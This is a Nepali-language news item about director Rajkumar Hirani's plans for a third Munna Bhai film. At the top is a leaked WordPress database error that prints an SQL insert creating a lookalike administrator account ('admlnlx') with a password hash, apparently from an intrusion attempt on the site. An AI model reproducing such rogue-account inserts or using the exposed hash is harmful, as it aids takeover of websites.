WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEEhH5OHiZtmvVHLgARvvBzV5QYnPx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 22:14:25', '', 'admlnlx', 'admlnlx')
भारत,माघ २५ –
बलिउडको एक चलचित्र जसलाई बालक, वृद्ध, युवा सबैले मन पराउँछन् भने यो सूचीमा सञ्जय दत्त, अरसद वारसी स्टारर फिल्म ‘मुन्ना भाइ एमबीबीएस’ अवश्य नै हुन्छ ।
राजकुमार हिरानीले जब यो चलचित्र बनाए, उनले सायदै यसको सफलताको आँकलन गरेका थिए । यसैगरी ‘मुन्नाभाइ एमबीबीएस’ पछि ‘लगे रहो मुन्ना भाइ’लाई पनि राम्रो सफलता मिल्यो । र, यसै समयबाट यो चलचित्रको आगामि सिक्वेलको प्रतीक्षा रहिरह्यो । मुन्ना भाइको तेस्रो फिल्मको नाम ‘मुन्नाभाइ चले अमेरिका’ भनिएको छ । यद्यपि यसको पुष्टि भने गरिएको छैन ।
हालै निर्देशक राजकुमार हिरानीले चलचित्रसँग सम्बन्धित कैयौँ कुरा सेयर गरेका छन् । निर्देशकले सञ्जय दत्तको बायोपिक सकिने बित्तिकै मुन्नाभाइमाथि काम गर्न सुरु गर्ने छन् । यो खबरले सञ्जयका फ्यान अवश्य खुसी हुनेछन् ।